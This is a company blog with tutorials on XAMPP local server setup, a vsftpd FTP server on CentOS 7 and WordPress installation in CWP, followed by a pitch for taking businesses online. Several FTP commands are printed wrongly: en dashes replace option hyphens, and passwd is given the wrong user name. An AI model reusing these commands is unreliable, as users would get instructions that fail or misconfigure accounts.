I’ll suggest to go for XAMPP when it comes to setting up a local development server. It’s available for use on Windows, Mac, and Linux distribution.

“Why I suggest XAMPP, well it’s not because of any functional difference, it’s because I have been using it since long and I am totally satisfied with its performance”.

-Vikash Mishra

Talking about XAMPP : XAMPP is an easy to install Apache distribution containing MariaDB, PHP, and Perl. Just download and start the installer. It’s that easy.

Step 2

Once you are done with installing any of the above Apache-MySQL distributions, you need to launch it and start the Apache and MySQL services.

XAMPP Control Panel

Once your Apache and MySQL services are up and running, you are ready to go with the next step.

NOTE:

  • Depending on the version of your OS, it may happen, that you get errors while launching services. In such cases, you need to either download the latest version of the XAMPP distribution or if you are using the latest one, you need to downgrade to a lower version.
  • There can be chances of clashes in port numbers with services running on your PC. For eg: Generally, Microsoft Skype port number clashes with Apache. You will need to troubleshoot it by either changing the port number or by removing the application that conflicts.

Step 3

Once your servers are up and running, you can navigate to your preferred browser and hit the following URL

http://localhost/ – hostname set during the installation of xampp

OR

http://127.0.0.1 – Loopback IP of same server

Once you hit the above URL, you will be taken to the default landing page of XAMPP.
Now you can get into the folder structure to put your own code and check if your development server is working or not.

In Windows, if you have installed the XAMPP with default settings, then your public directory will be in C:\xampp\htdocs\

If you are on a Mac Machine, you need to go into Finder -> Applications -> XAMPP -> xamppfiles -> htdocs

In this folder, you can put your files and can access it from the browser using the above URL

Step 4

Moving forward, to access the local server on other devices, you will need to connect the device to the same network. For example – If your local server is connected to your home WiFi network, you will need to connect another device, say your mobile phone, to the same WiFi network.

Once you are connected with same network on both the devices, go to the command prompt (in windows), terminal (in Linux and Mac), on your local server and hit the below command –

Mac and Linux -> ifconfig

Windows -> ipconfig

IP Address in Windows

You will get the IP address of your local server. Now hit the IP address in you another device browser to access the htdocs folder of your local server.

When you hit the IP address of the local server in another PC’s browser, it searches for the server in your network, and reaches to the local server, and this request is received by the Apache server running in your XAMPP distribution.

Once the Apache server receives the request, it processes it and returns back the response.

This short and simple tutorial can help developers to setup a small local development environment and look forward for better responsive design and optimized coding, and move it to a global platform using either of the available hosting options like shared hosting, or a VPS, or Dedicated Server

How to make your old PC a FTP Server ?

If you are having an old PC and want to utilize it in the modern world. You can do it by simply setting it up as a server for keeping your files on it.

FTP stands for File Transfer Protocol. It has been a standard method for transferring files between computers for decades.

Although security measures have been added, FTP is by nature an insecure method for transferring files. However, it can be useful when making files available to multiple users, or when working in a secure and private network.

To setup your follow our How to make your PC a FTP server ? guide below and set your own FTP server, which you can access over the internet.

PREREQUISITE

You need to have

  • A PC / Laptop
  • Internet connection
  • A static public IP (connect with your ISP for this)
  • You need to download and install Cent OS 7 on your PC. For this you can read our guide on How to download and install CentOS 7 ?
  • Access to a user account with sudo privileges
  • The yum package manager, installed by default
  • A text editor of your choice

Without further a do, let’s get started with setting up the FTP server, on your CentOS 7 PC.

Install FTP Service with VSFTPD

How to install FTP Server on CentOS7 with VSFTPD

Here we are using the VSFTPD ,which stands for Very Secure FTP Daemon software package. It’s a relatively easy software utility to use for creating an FTP server.

After logging in to the CentOS 7, in the console, start typing the commands as below:

  • To install the FTP services let’s first start with updating the server packages.
sudo yum update

It can take time to update the packages, sit back and let it complete.

  • Install VSFTPD software with the following command:
sudo yum install vsftpd

It can ask you for the permission to download and install the package. Simply type Y and hit Enter and let the process complete.

  • Start the VSFTPD services by hitting the following command
sudo systemctl start vsftpd
  • Setup auto-launch for the VSFTPD services when system reboots
sudo systemctl enable vsftpd
  • Once you are done with the above, you need to setup rules to use the FTP port number 21 in your firewall.
sudo firewall-cmd --zone=public --permanent --add-port=21/tcp
sudo firewall-cmd --zone=public --permanent --add-service=ftp
sudo firewall-cmd –-reload

Run the above code one by one and it should give you a success output for all the three.

Congrats! you have installed your VSFTPD services. Now let’s move forward with configuration of the VSFTPD services.

Configuring VSFTPD

The behavior of the FTP service on your server is decided based on the /etc/vsftpd/vsftpd.conf configuration file.

Let’s first backup the required files so that in case of any configuration failures, we can use the backup.

First of all, create a copy of /etc/vsftpd/vsftpd.conf file

sudo cp /etc/vsftpd/vsftpd.conf /etc/vsftpd/vsftpd.conf.default

Now, let’s edit the configuration file with the following command:

sudo nano /etc/vsftpd/vsftpd.conf

Set your FTP server to disable anonymous users and allow local users.

Find the following entries in the configuration file, and edit them to match the following:

anonymous_enable=NO
local_enable=YES
write_enable=YES
chroot_local_user=YES
allow_writeable_chroot=YES

In above snippet, we are disabling the anonymous user access to secure our server access from unknown users,
We are allowing only local user access
We are allowing logged in users to upload files in the server
Limiting FTP users to their own home directory.

The vsftpd utility provides a way to create an approved user list. To manage users this way, find the userlist_enable entry, then edit the file to look as follows:

userlist_enable=YES
userlist_file=/etc/vsftpd/user_list
userlist_deny=NO

You can now edit the /etc/vsftpd/user_list file, and add your list of users. (List one per line.) The userlist_deny option lets you specify users to be included; setting it to yes would change the list to users that are blocked.

Once you’re finished editing the configuration file, save your changes. Restart the vsftpd service to apply changes:

sudo systemctl restart vsftpd

Lets move forward and create our FTP User

Create a New FTP User

sudo adduser testuser
sudo passwd testuser123

The system may prompt you to enter and confirm a password for the new user.

Add the new user to the userlist:

echo “testuser” | sudo tee –a /etc/vsftpd/user_list

Create directory for FTP User access

sudo mkdir –p /home/testuser/ftp/upload
sudo chmod 550 /home/testuser/ftp
sudo chmod 750 /home/testuser/ftp/upload
sudo chown –R testuser: /home/testuser/ftp

This creates a home/testuser directory for the new user, with a special directory for uploads. It sets permissions for uploads only to the /uploads directory.

Now, you can log in to your FTP server with the user you created:
You can use ftp client software like FileZilla to access your server using your server public IP (must have ftp port forwarding to your server IP on your router) as the host name, your username, password and port number 21.

You c

Conclusion

Now you know how to set up and install an FTP server on Centos 7 with VSFTPD. You should be able to login to your server via FTP and start transferring files.

If you still face issues setting up your FTP Server, or require services related to Server Setup, please get in touch with us here, our team will be happy to help you.

How to install WordPress in CentOS Web Panel (CWP)

Using CWP hosting? Looking to setup a your own blog ? Need to install WordPress in your account ?

If you are using a CWP hosting and want to install WordPress in your account, then it is too simple. You can install WordPress following the simple steps as mentioned below.

To install WordPress from CWP:

  1. Log in to your CWP user account
  2. On the dashboard look for the WordPress icon (Addons section) and click on it
  3. Configure the options:
    – choose the protocol you want to use (https if you want to use SSL), also if you want to access your site with www or not.
    – choose the domain(you can have multiple domains on the same CWP account) on which you want to install WordPress
    – enter the desired directory – leave the field empty if you don’t want to install WP in a directory.
    – enter the database name – CWP will automatically fill this field – you can let is as it is
    – enter database username (this IS NOT the WordPress admin username)
    – database password – enter a strong password.
  4. Click the Install button. Wait for a few seconds and access the site on which you wanted to install WordPress. Now you just have to enter some WP settings (like language, admin username, password and email etc.)
  5. Your WordPress installation is live now

If you are looking for better support, you can connect with us here

Get your business online today!

Are you facing issues with your business in #CoronaEffect? We can help you get your business online today!. Our team can help you to stay in business even while you stay at home.

We are helping businesses in getting their work done from anywhere they are, anywhere their team is. We are providing online platforms for all medium and small size businesses, so that they can run their business and survive in #CoronaEffect.

Our team can help you plan your work either by setting up a VPN (Virtual Private Network), where all the team can work together in an isolated environment, or setting up steps to plan your business once you move out of the #Lockdown.

We can do analysis the global statistics and understand that all the business are taking steps to move their business online, whether it be an e-commerce platform or a digitally marketing platform for business, everyone is putting their footprints on the internet.

We have gathered 5 steps solution to move your business online and to give you a walk-through, where you can understand how you can shift your business online, and how it can be fruitful for you in a long go.

Step One

If you are new to the internet market and putting your first step, you should proffer reading from here. If you already have your website and have existence on the internet, you can skip this step and move to the steps below.

Bring your business on internet

First of all, you need to have a presence on the internet. In simple words, you must have a website to showcase your business, your work, your services, your products, your contact details, etc. .

For creating a website, you will require the following:

  • Domain Name – A name which will be used to access your website, eg. example.com
  • Hosting – Hosting account is used to host files of your website data. While purchasing a hosting account, you should not go for a cheaper one. Always opt for a good configuration. This will help your website in a better load time, which will enhance your search engine listing.
  • SSL – SSL is required to encrypt data you transfer from your end to your client’s end and vice versa. This adds another layer of security to your website, which will also be an add-on in your search engine listing. Many people suggest SSL as an optional stuff. But I’ll suggest to take it as a mandatory one.
  • Website Developer – Website developer will help you developing your website based on your requirements. You can take help from our team too. We are not too costly. You can connect with us for your project here

Step Two

Once you are done developing your website, it is suggested to move to different social websites. Creating business presence on different social networks enhances the reach ability of your business.

Social Media Presence

We recommend the presence on the following social platforms:

  • Facebook
  • Twitter
  • LinkedIn
  • Instagram
  • Pinterest
  • YouTube

Once you are done with creating your bushiness’s social profile. You should now move on to the marketplace from where you can generate leads. This section comes in two parts, free and paid. Create your profile on lead generation websites based on the service or product you sell. Eg. If you are selling services related to event management, you should prefer setting up your account on eventpanda.in

We’ll suggest to setup at-least a free account on the below lead generation websites:

  • Event Panda
  • India Mart
  • Google Business
  • Sulekha
  • Yellow Pages
  • Trade India
  • Just Dial

Your social presence will create back-links for you, which will help your customers to reach back to your website where you have kept all your business details and products / services which you exactly want to sell / showcase.

Step Three

You are don with your website development, your social media and search engine presence, now it’s time for your brand setup.

Generally, agencies dealing with your business marketing will help you setting up your brand. This is not too costly, and will help you generate your brand value in the global market.

Business Branding

You should start building your branding by setting up your professional / business email first. Eg. info@example.com. You should not be using a gmail or other common email address for your business emails.

There are freely available plans for emails with many good email service providers like Zoho. But take my words, you should not opt for a free email for your business, as it gives small attachment size, less number of email IDs and lot more limitations. While setting up stuffs for your business you should go for paid versions, as the come with lot of add-on features and higher availability.

Setting up your brand values include the best write-ups that describes your business, services, products, mission, vision, your terms & policies, etc.. You should setup proper documentation of your companies profile on your website and ensure that all the data is up to date with the version numbers of each updated document.
This helps build better brand value and faith between customers.

Step Four

After building your brand value, it’s time to setup something for your manpower, your own organization’s working structure.

You can opt for setting up Corporate Resource Management (CRM) tools, Human Resource Management (HRM) tool, Accounting tools, etc., that will help you to manage the workforce and other tasks.

Develop You Own Corporate Tools

These tools are generally build with generic modules that will help your business to operate smoothly. But in some cases, you business can be different from others and require a different setup. For this you can opt for getting a custom software developed, which can help you manage you work as per your requirements and ease.

We have developed such custom software for multiple companies including some bigger ones like ITC, & WPO. You can hire us here to get your tool developed.

Step Five

We know that all businesses are not the same, and may or may not require to go through all the above phases. There can be chances of different requirements and online shifting modules. So in this step we will talk about a few different modules, (and not limited to this), that a business may require.

Corporate Setup
  • Online teaching / meeting / conferencing platform – There can be requirements of online video conferencing platforms for different purpose which may be required by different businesses.
  • VPN Setup – Virtual Private Network setup may be a necessity of businesses who require an isolated network where the team can work together. Generally companies who build tools on intranet, (or can have different purpose), setup a virtual private network, which allows access to local network on internet through a very secure tunnel.
  • RDP Setup – Remote Desktop Protocol is used to access remote desktop over internet. It is generally done when either the organization has provided dedicated systems to each employee and the employee needs access to the desktop from a remote location. Or in a scenario where a central server is used by team to work and access data.

There can be multiple other scenarios which can be involved to move your work online.

We at M/s VIKASH TECH help businesses to develop tools and move their businesses online. We also provide long term support on different products and services.

If you are looking forward to develop a proper setup for your business online. You should get in touch with our team for proper consultation.

You can connect with us here

Do feel free to leave your valuable comments below.